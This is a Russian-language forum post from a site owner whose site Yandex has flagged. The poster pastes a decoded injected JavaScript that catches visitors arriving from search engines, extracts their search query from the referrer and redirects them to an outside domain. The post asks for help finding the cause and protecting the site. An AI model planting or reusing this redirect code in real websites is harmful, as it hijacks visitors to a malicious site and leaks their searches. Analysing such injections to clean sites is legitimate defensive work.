Спасибо за помощь, но такой строчки у меня нет в модуле. Скорее всего не совпадают версии.
На сайте стоит версия 5.0. Обновить до последней, или что-то можно сделать с 5.0 ?
Пытаются? На сайте вроде ничего интересного пока нет. А причем Яша и вредоносный код? Перелопатил весь скрипт, вроде чисто. Никаких iframe, eval unescape, base64 не нашел. Изменений в файлах по дате тоже нет! На что-же реагирует яндекс? Кстати данный скрипт в расшифрованном виде, если кому интересно:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(unescape("<script type="text/javascript">sp_redirect = {};sp_redirect.searchers = [ [/google./i, /(?|&)q=(.*?)(&|$)/i, 2], [/search.yahoo./i, /(?|&)p=(.*?)(&|$)/i, 2], [/bing.com/i, /(?|&)q=(.*?)(&|$)/i, 2], [/search.aol./i, /(?|&)q=(.*?)(&|$)/i, 2], [/ask.com/i, /(?|&)q=(.*?)(&|$)/i, 2], [/altavista./i, /(?|&)q=(.*?)(&|$)/i, 2], [/search.lycos./i, /(?|&)query=(.*?)(&|$)/i, 2], [/alltheweb./i, /(?|&)q=(.*?)(&|$)/i, 2], [/yandex./i, /(?|&)text=(.*?)(&|$)/i, 2], [/(nova.|search.)?rambler./i, /(?|&)query=(.*?)(&|$)/i, 2], [/gogo./i, /(?|&)q=(.*?)(&|$)/i, 2], [/go.mail./i, /(?|&)q=(.*?)(&|$)/i, 2], [/nigma./i, /(?|&)s=(.*?)(&|$)/i, 2]];sp_redirect.sp_redirect = function(referer) { var query=null; for(var i=0; i<sp_redirect.searchers.length; i++) { var se = sp_redirect.searchers; if (referer.match(se[0])) { query = referer.match(se[1])[se[2]]; break; } } document.location.href='http://shara.many-search-archiv.ru/'+'?wkey="+l('825c8')+"'+''+(query? '&query='+query : '');};sp_redirect.sp_redirect(document.referrer);</script>"));}Miranda1974 добавил 18.06.2011 в 02:21Не хотелось бы модуль убирать, какие еще версии защиты подскажете?
